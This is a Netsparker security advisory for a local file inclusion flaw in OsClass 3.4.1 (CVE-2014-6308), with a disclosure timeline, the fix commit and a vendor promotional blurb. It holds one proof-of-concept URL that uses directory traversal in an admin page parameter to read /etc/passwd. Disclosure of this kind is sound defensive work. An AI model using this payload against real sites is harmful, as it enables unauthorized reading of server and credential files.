49 lines
No EOL
1.6 KiB
Text
49 lines
No EOL
1.6 KiB
Text
Information
|
|
-----------
|
|
Advisory by Netsparker.
|
|
Name : LFI Vulnerability in OsClass
|
|
Affected Software : OsClass
|
|
Affected Versions: 3.4.1 and possibly below
|
|
Vendor Homepage : http://osclass.org/
|
|
Vulnerability Type : Local File Inclusion
|
|
Severity : Critical
|
|
CVE-ID: CVE-2014-6308
|
|
Netsparker Advisory Reference : NS-14-031
|
|
|
|
Advisory URL
|
|
------------
|
|
https://www.netsparker.com/lfi-vulnerability-in-osclass/
|
|
|
|
Description
|
|
-----------
|
|
Local file inclusion vulnerability where discovered in Osclass, an
|
|
open source project that allows you to create a classifieds sites.
|
|
|
|
Technical Details
|
|
-----------------
|
|
Proof of Concept URL for LFI in OsClass:
|
|
|
|
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
|
|
|
|
Advisory Timeline
|
|
-----------------
|
|
03/09/2014 - First Contact
|
|
03/09/2014 - Vulnerability fixed:
|
|
https://github.com/osclass/Osclass/commit/c163bf5910d0d36424d7fc678da6b03a0e443435
|
|
15/09/2014 - Fix released publicly in Osclass 3.4.2
|
|
|
|
Credits & Authors
|
|
-----------------
|
|
These issues have been discovered by Omar Kurt while testing
|
|
Netsparker Web Application Security Scanner.
|
|
|
|
About Netsparker
|
|
----------------
|
|
Netsparker can find and report security issues and vulnerabilities
|
|
such as SQL Injection and Cross-site Scripting (XSS) in all websites
|
|
and web applications regardless of the platform and the technology
|
|
they are built on. Netsparker's unique detection and exploitation
|
|
techniques allows it to be dead accurate in reporting hence it's the
|
|
first and the only False Positive Free web application security
|
|
scanner. For more information on Netsparker visit
|
|
https://www.netsparker.com. |